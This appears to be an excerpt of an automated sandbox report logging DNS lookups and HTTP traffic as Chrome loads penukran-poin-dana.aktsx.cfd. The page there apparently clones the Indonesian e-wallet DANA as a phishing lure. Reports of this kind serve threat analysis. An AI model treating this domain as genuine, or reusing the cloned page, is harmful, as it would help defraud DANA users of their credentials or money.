                                                                                                                            Oct 6, 2024 13:50:13.591952085 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:13.591996908 CEST49796443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:13.592004061 CEST44349796172.217.18.1192.168.2.6
                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Oct 6, 2024 13:50:04.354547977 CEST192.168.2.61.1.1.10xd2c0Standard query (0)penukran-poin-dana.aktsx.cfdA (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:04.354643106 CEST192.168.2.61.1.1.10xd535Standard query (0)penukran-poin-dana.aktsx.cfd65IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:05.711589098 CEST192.168.2.61.1.1.10xe49dStandard query (0)unpkg.comA (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:05.712258101 CEST192.168.2.61.1.1.10x968fStandard query (0)unpkg.com65IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:05.713707924 CEST192.168.2.61.1.1.10xb03bStandard query (0)dev-danapemulihan.pantheonsite.ioA (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:05.714612007 CEST192.168.2.61.1.1.10xf699Standard query (0)dev-danapemulihan.pantheonsite.io65IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:05.722778082 CEST192.168.2.61.1.1.10x3b22Standard query (0)blogger.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:05.723301888 CEST192.168.2.61.1.1.10x1743Standard query (0)blogger.googleusercontent.com65IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:06.085568905 CEST192.168.2.61.1.1.10xec05Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:06.086019993 CEST192.168.2.61.1.1.10xdf4fStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:06.086987972 CEST192.168.2.61.1.1.10x1abeStandard query (0)penukran-poin-dana.aktsx.cfdA (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:06.087367058 CEST192.168.2.61.1.1.10x9e9aStandard query (0)penukran-poin-dana.aktsx.cfd65IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:06.458893061 CEST192.168.2.61.1.1.10x46ccStandard query (0)unpkg.comA (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:06.459657907 CEST192.168.2.61.1.1.10x9f5fStandard query (0)unpkg.com65IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:06.517780066 CEST192.168.2.61.1.1.10x6ee0Standard query (0)dev-danapemulihan.pantheonsite.ioA (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:06.518822908 CEST192.168.2.61.1.1.10xfbd7Standard query (0)dev-danapemulihan.pantheonsite.io65IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:07.198966980 CEST192.168.2.61.1.1.10x1fd3Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:07.199090958 CEST192.168.2.61.1.1.10x3763Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:08.888874054 CEST192.168.2.61.1.1.10x4852Standard query (0)www.dana.idA (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:08.889344931 CEST192.168.2.61.1.1.10xfce1Standard query (0)www.dana.id65IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:09.293960094 CEST192.168.2.61.1.1.10x9ebcStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:09.294233084 CEST192.168.2.61.1.1.10x457bStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:09.298048973 CEST192.168.2.61.1.1.10xd139Standard query (0)blogger.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:09.301031113 CEST192.168.2.61.1.1.10x7d60Standard query (0)blogger.googleusercontent.com65IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:10.614345074 CEST192.168.2.61.1.1.10xadabStandard query (0)www.dana.idA (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:10.614685059 CEST192.168.2.61.1.1.10x47b2Standard query (0)www.dana.id65IN (0x0001)false
                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Oct 6, 2024 13:50:04.707779884 CEST1.1.1.1192.168.2.60xd2c0No error (0)penukran-poin-dana.aktsx.cfd165.22.241.119A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:05.719017982 CEST1.1.1.1192.168.2.60x968fNo error (0)unpkg.com65IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:05.719034910 CEST1.1.1.1192.168.2.60xe49dNo error (0)unpkg.com104.17.249.203A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:05.719034910 CEST1.1.1.1192.168.2.60xe49dNo error (0)unpkg.com104.17.246.203A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:05.719034910 CEST1.1.1.1192.168.2.60xe49dNo error (0)unpkg.com104.17.245.203A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:05.719034910 CEST1.1.1.1192.168.2.60xe49dNo error (0)unpkg.com104.17.247.203A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:05.719034910 CEST1.1.1.1192.168.2.60xe49dNo error (0)unpkg.com104.17.248.203A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:05.729677916 CEST1.1.1.1192.168.2.60x3b22No error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:05.729677916 CEST1.1.1.1192.168.2.60x3b22No error (0)googlehosted.l.googleusercontent.com172.217.18.1A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:05.730345011 CEST1.1.1.1192.168.2.60x1743No error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:05.734868050 CEST1.1.1.1192.168.2.60xf699No error (0)dev-danapemulihan.pantheonsite.iofe4.edge.pantheon.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:05.737174988 CEST1.1.1.1192.168.2.60xb03bNo error (0)dev-danapemulihan.pantheonsite.iofe4.edge.pantheon.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:05.737174988 CEST1.1.1.1192.168.2.60xb03bNo error (0)fe4.edge.pantheon.io23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:06.092268944 CEST1.1.1.1192.168.2.60xec05No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:06.092268944 CEST1.1.1.1192.168.2.60xec05No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:06.092268944 CEST1.1.1.1192.168.2.60xec05No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:06.092268944 CEST1.1.1.1192.168.2.60xec05No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:06.422141075 CEST1.1.1.1192.168.2.60x1abeNo error (0)penukran-poin-dana.aktsx.cfd165.22.241.119A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:06.465594053 CEST1.1.1.1192.168.2.60x46ccNo error (0)unpkg.com104.17.247.203A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:06.465594053 CEST1.1.1.1192.168.2.60x46ccNo error (0)unpkg.com104.17.246.203A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:06.465594053 CEST1.1.1.1192.168.2.60x46ccNo error (0)unpkg.com104.17.248.203A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:06.465594053 CEST1.1.1.1192.168.2.60x46ccNo error (0)unpkg.com104.17.249.203A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:06.465594053 CEST1.1.1.1192.168.2.60x46ccNo error (0)unpkg.com104.17.245.203A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:06.466739893 CEST1.1.1.1192.168.2.60x9f5fNo error (0)unpkg.com65IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:06.526777029 CEST1.1.1.1192.168.2.60xfbd7No error (0)dev-danapemulihan.pantheonsite.iofe4.edge.pantheon.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:06.530350924 CEST1.1.1.1192.168.2.60x6ee0No error (0)dev-danapemulihan.pantheonsite.iofe4.edge.pantheon.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:06.530350924 CEST1.1.1.1192.168.2.60x6ee0No error (0)fe4.edge.pantheon.io23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:07.205785990 CEST1.1.1.1192.168.2.60x3763No error (0)www.google.com65IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:07.205912113 CEST1.1.1.1192.168.2.60x1fd3No error (0)www.google.com142.250.184.196A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:08.902700901 CEST1.1.1.1192.168.2.60x4852No error (0)www.dana.idwww.dana.id.w.cdngslb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:08.902700901 CEST1.1.1.1192.168.2.60x4852No error (0)www.dana.id.w.cdngslb.com163.181.92.228A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:08.902700901 CEST1.1.1.1192.168.2.60x4852No error (0)www.dana.id.w.cdngslb.com163.181.92.229A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:08.902700901 CEST1.1.1.1192.168.2.60x4852No error (0)www.dana.id.w.cdngslb.com163.181.92.230A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:08.902700901 CEST1.1.1.1192.168.2.60x4852No error (0)www.dana.id.w.cdngslb.com163.181.92.231A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:08.902700901 CEST1.1.1.1192.168.2.60x4852No error (0)www.dana.id.w.cdngslb.com163.181.92.232A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:08.902700901 CEST1.1.1.1192.168.2.60x4852No error (0)www.dana.id.w.cdngslb.com163.181.92.233A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:08.902700901 CEST1.1.1.1192.168.2.60x4852No error (0)www.dana.id.w.cdngslb.com163.181.92.234A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:08.902700901 CEST1.1.1.1192.168.2.60x4852No error (0)www.dana.id.w.cdngslb.com163.181.92.235A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:09.084852934 CEST1.1.1.1192.168.2.60xfce1No error (0)www.dana.idwww.dana.id.w.cdngslb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:09.301122904 CEST1.1.1.1192.168.2.60x9ebcNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:09.301122904 CEST1.1.1.1192.168.2.60x9ebcNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:09.301122904 CEST1.1.1.1192.168.2.60x9ebcNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:09.301122904 CEST1.1.1.1192.168.2.60x9ebcNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:09.304899931 CEST1.1.1.1192.168.2.60xd139No error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:09.304899931 CEST1.1.1.1192.168.2.60xd139No error (0)googlehosted.l.googleusercontent.com142.250.185.193A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:09.308723927 CEST1.1.1.1192.168.2.60x7d60No error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:10.637883902 CEST1.1.1.1192.168.2.60x47b2No error (0)www.dana.idwww.dana.id.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:10.645102978 CEST1.1.1.1192.168.2.60xadabNo error (0)www.dana.idwww.dana.id.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:20.058109045 CEST1.1.1.1192.168.2.60x1d5dNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:20.058109045 CEST1.1.1.1192.168.2.60x1d5dNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:36.486716032 CEST1.1.1.1192.168.2.60x4fc7No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:36.486716032 CEST1.1.1.1192.168.2.60x4fc7No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:55.671224117 CEST1.1.1.1192.168.2.60x99d7No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:55.671224117 CEST1.1.1.1192.168.2.60x99d7No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.18A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:50:55.671224117 CEST1.1.1.1192.168.2.60x99d7No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.34A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:51:15.451297998 CEST1.1.1.1192.168.2.60xed47No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                            Oct 6, 2024 13:51:15.451297998 CEST1.1.1.1192.168.2.60xed47No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.649716165.22.241.119806220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 6, 2024 13:50:04.716039896 CEST443OUTGET / HTTP/1.1
                                                                                                                            Host: penukran-poin-dana.aktsx.cfd
                                                                                                                            Connection: keep-alive
                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Oct 6, 2024 13:50:05.615854025 CEST1236INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:05 GMT
                                                                                                                            Server: Apache
                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Data Raw: 32 30 30 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 64 22 3e 0a 3c 21 2d 2d 20 48 54 4d 4c 20 4d 65 74 61 20 54 61 67 73 20 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 31 38 45 45 41 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 74 69 74 6c 65 3e f0 9d 97 97 f0 9d 97 94 f0 9d 97 a1 f0 9d 97 94 20 7c 20 f0 9d 97 96 f0 9d 98 82 f0 9d 98 80 f0 9d 98 81 f0 9d [TRUNCATED]
                                                                                                                            Data Ascii: 2000<html lang="id">... HTML Meta Tags --><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="theme-color" content="#118EEA"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1"> <title> | </title> <meta name="description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!"> ... Facebook Meta Tags --> <meta property="og:url" content="https://www.dana.id"> <meta property="og:type" content="website"> <meta property="og:title" content=" | "> <meta property="og:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan di [TRUNCATED]
                                                                                                                            Oct 6, 2024 13:50:05.615875959 CEST224INData Raw: 41 4e 41 2e 20 41 6d 62 69 6c 20 62 61 67 69 61 6e 20 64 61 6c 61 6d 20 74 72 61 6e 73 66 6f 72 6d 61 73 69 20 6b 65 75 61 6e 67 61 6e 20 64 69 67 69 74 61 6c 20 64 69 20 49 6e 64 6f 6e 65 73 69 61 20 73 65 6b 61 72 61 6e 67 21 22 3e 0a 20 20 3c
                                                                                                                            Data Ascii: ANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!"> <meta property="og:image" content="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiftOkTXOPr5az8LHt3m-DZNiM0T98GalJ0P3bBLQKs7yZxbNP
                                                                                                                            Oct 6, 2024 13:50:05.615891933 CEST1236INData Raw: 48 56 6e 39 63 41 47 70 7a 5f 70 41 65 56 55 68 6c 36 50 50 58 78 59 48 69 76 50 6c 4f 31 49 6d 45 70 4d 47 31 71 39 74 4e 77 59 43 37 4e 75 4b 31 5f 48 4c 6b 45 4e 42 79 76 74 33 32 55 30 64 4b 4a 6a 43 76 48 48 79 4b 44 5f 42 35 43 34 4f 44 7a
                                                                                                                            Data Ascii: HVn9cAGpz_pAeVUhl6PPXxYHivPlO1ImEpMG1q9tNwYC7NuK1_HLkENByvt32U0dKJjCvHHyKD_B5C4ODzys4XKa7Uuouta6mgd5VFUSEVPhJJTvnsGDXcpOo0IqBFQBueNHkaDcCSRA/s1080/IMG_20231205_025342.jpg"> ... Twitter Meta Tags --> <meta name="twitter:card" content="sum
                                                                                                                            Oct 6, 2024 13:50:05.615906954 CEST224INData Raw: 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 6e 63 72 79 70 74 65 64 2d 74 62 6e 30 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 3f 71 3d 74 62 6e 3a 41 4e 64 39 47 63 51 5a 39 64 41 54 73 5f 6e 6b 7a 79 4f 2d 67 53 6f 51 57 62 74 49 68 4a
                                                                                                                            Data Ascii: ef="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQZ9dATs_nkzyO-gSoQWbtIhJV7bG51r3gOKg&usqp=CAU" rel="apple-touch-icon"> <link rel="canonical" href="https://www.dana.id/"> <meta property="og:url" content="https:/
                                                                                                                            Oct 6, 2024 13:50:05.616014004 CEST1236INData Raw: 2f 77 77 77 2e 64 61 6e 61 2e 69 64 2f 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 48 61 69 20 54 65 6d 61 6e 44 41 4e 41 2c 20 4a 69 6b 61 20 6d 65 6d
                                                                                                                            Data Ascii: /www.dana.id/" /><meta property="og:description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung"><meta property="twitter:description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung"><l
                                                                                                                            Oct 6, 2024 13:50:05.616039991 CEST1236INData Raw: 2d 62 6f 78 3b 0a 20 20 73 63 72 6f 6c 6c 62 61 72 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 20 2f 2a 20 74 68 75 6d 62 20 61 6e 64 20 74 72 61 63 6b 20 63 6f 6c 6f 72 20 2a 2f 0a 20 20 73 63
                                                                                                                            Data Ascii: -box; scrollbar-color: transparent transparent; /* thumb and track color */ scrollbar-width: 0px;}*::-webkit-scrollbar { width: 0;}*::-webkit-scrollbar-track { background: transparent;}*::-webkit-scrollbar-thumb { background
                                                                                                                            Oct 6, 2024 13:50:05.616056919 CEST1236INData Raw: 25 2c 37 30 70 78 29 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 31 31 38 45 45 41 3b 0a 7d 0a 0a 2e 63 61 72 6f 75 73 65
                                                                                                                            Data Ascii: %,70px); color: #000; font-size: 2em; background-color: #118EEA;}.carousel__snapper { position: relative; top: 0; left: 0; right: 0; bottom: 0; width: 100%; height: 100%; scroll-snap-align: center; background-color:
                                                                                                                            Oct 6, 2024 13:50:05.616071939 CEST1236INData Raw: 65 66 74 3a 20 2d 31 72 65 6d 3b 0a 7d 0a 0a 2e 63 61 72 6f 75 73 65 6c 3a 3a 61 66 74 65 72 2c 0a 2e 63 61 72 6f 75 73 65 6c 5f 5f 6e 65 78 74 20 7b 0a 20 20 72 69 67 68 74 3a 20 30 72 65 6d 3b 0a 7d 0a 0a 2e 63 61 72 6f 75 73 65 6c 3a 3a 62 65
                                                                                                                            Data Ascii: eft: -1rem;}.carousel::after,.carousel__next { right: 0rem;}.carousel::before,.carousel::after { content: ''; z-index: 1; background-color: #fff; background-size: 1.5rem 1.5rem; background-repeat: no-repeat; background-po
                                                                                                                            Oct 6, 2024 13:50:05.616086960 CEST1236INData Raw: 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 0a 20 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64
                                                                                                                            Data Ascii: keyframes spin { 0% { transform: rotate(360deg); } 100% { transform: rotate(0deg); }}@-webkit-keyframes spin { 0% { -webkit-transform: rotate(360deg); } 100% { -webkit-transform: rotate(0deg); }}@-moz-keyframes spin { 0% { -webki
                                                                                                                            Oct 6, 2024 13:50:05.616102934 CEST1236INData Raw: 65 74 2f 69 6d 67 2f 64 61 6e 61 5f 6c 6f 67 6f 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 20 61 6c 74 3d 22 22 3e 0a 09 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 3c 64 69 76 20 63
                                                                                                                            Data Ascii: et/img/dana_logo.png" class="logo" alt=""></div><div class="content"><div class="hero"><img src="asset/img/hero.svg" alt=""></div><h1>Dompet digital untuk kamu!</h1><p class="desc">Simpan uang serta kartu debit/kredit d
                                                                                                                            Oct 6, 2024 13:50:05.620873928 CEST1236INData Raw: 74 65 6e 74 2e 63 6f 6d 2f 69 6d 67 2f 62 2f 52 32 39 76 5a 32 78 6c 2f 41 56 76 58 73 45 69 6c 55 4d 49 47 5f 49 4d 46 56 69 78 54 46 70 57 62 34 78 41 35 66 31 48 4a 74 32 35 6c 62 76 2d 63 63 31 62 61 6b 6e 42 5f 59 4a 65 57 4f 39 46 59 55 34
                                                                                                                            Data Ascii: tent.com/img/b/R29vZ2xl/AVvXsEilUMIG_IMFVixTFpWb4xA5f1HJt25lbv-cc1baknB_YJeWO9FYU4SJOzdeMNkA1msFpUU-0MiI3B-llmFX122-XhqCq7-1HW4YUfaWX52rlNtfspDDvlFNj_A--xZIRknP3ycDkzm51noxYaFx_gfOck3U745QZSBwpCSesqOq1oEycuQamqaZlqoz/s16000/ezgif.com-crop%20(3
                                                                                                                            Oct 6, 2024 13:50:05.881711006 CEST410OUTGET /asset/img/load_bg.png HTTP/1.1
                                                                                                                            Host: penukran-poin-dana.aktsx.cfd
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Oct 6, 2024 13:50:06.201767921 CEST1236INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:06 GMT
                                                                                                                            Server: Apache
                                                                                                                            Last-Modified: Sun, 21 Apr 2024 03:10:27 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 7863
                                                                                                                            Keep-Alive: timeout=5, max=99
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: image/png
                                                                                                                            Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 01 2c 08 04 00 00 00 d3 74 46 fe 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 02 62 4b 47 44 00 ff 87 8f cc bf 00 00 00 07 74 49 4d 45 07 e6 0b 01 06 0c 01 1c 9a 07 63 00 00 1d 8b 49 44 41 54 78 da ed 9d d9 6f 64 47 76 a7 bf 73 6f 6e cc 4c 92 c9 2d b9 6f b5 48 55 25 95 aa 54 da bb 5b 52 6b 6d 61 ba a7 0d 5b f0 8b fb c1 f0 c3 3c ce f2 34 c0 60 80 99 bf c0 2f f3 34 b0 81 01 c6 30 da 63 f7 00 83 6e 60 ec 1e 49 2d 95 dd b2 d4 56 ab a4 5a 54 7b 15 c9 e2 be 6f c9 25 d7 1b f3 90 cc 22 8b 64 92 99 cc e5 de cb 8c 8f 28 56 ee 8c 88 fc dd 13 27 4e 9c 88 10 34 db 08 02 18 f8 09 10 c0 8f 0f 03 03 03 13 c1 c0 04 2c 2c 2c 32 28 32 58 24 49 10 27 4e 02 0b 50 28 bb 2b e0 1c c4 ee 02 d8 8c 41 90 10 1e 0c ea 69 23 82 1f 0f de c7 ff 4c 04 c1 40 b6 7e b2 e2 c9 fe 58 28 32 a4 48 3f fe 97 60 99 39 62 58 a4 59 67 03 [TRUNCATED]
                                                                                                                            Data Ascii: PNGIHDR,,tFgAMAa cHRMz&u0`:pQ<bKGDtIMEcIDATxodGvsonL-oHU%T[Rkma[<4`/40cn`I-VZT{o%"d(V'N4,,,2(2X$I'NP(+Ai#L@~X(2H?`9bXYgI- I=4>m{Y!s+'IY&*C cwM-CvixrwaB[M':c,knjq%hN:@S,qvC0vMebnU!M+Pq-@Mab~/a9C;MxtwG/-@%f,K.*~L0H-QaX`X;# `z.RB#1):nKEs<!s$.Niq'r>B.S!qaV.Q+>Vd[c}t|tr4!k# (&S$:9A?U(l0mF08s)IDH05wr|JV\Wv.,?'H>jIFsXAI?/0X_>$|#F*,K<MH*:w)g3yB%npEgD;U|wN%,W9W|Z;oawA\AxYtNt)29\IWPMVV?u1A,iwQ ,xq


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
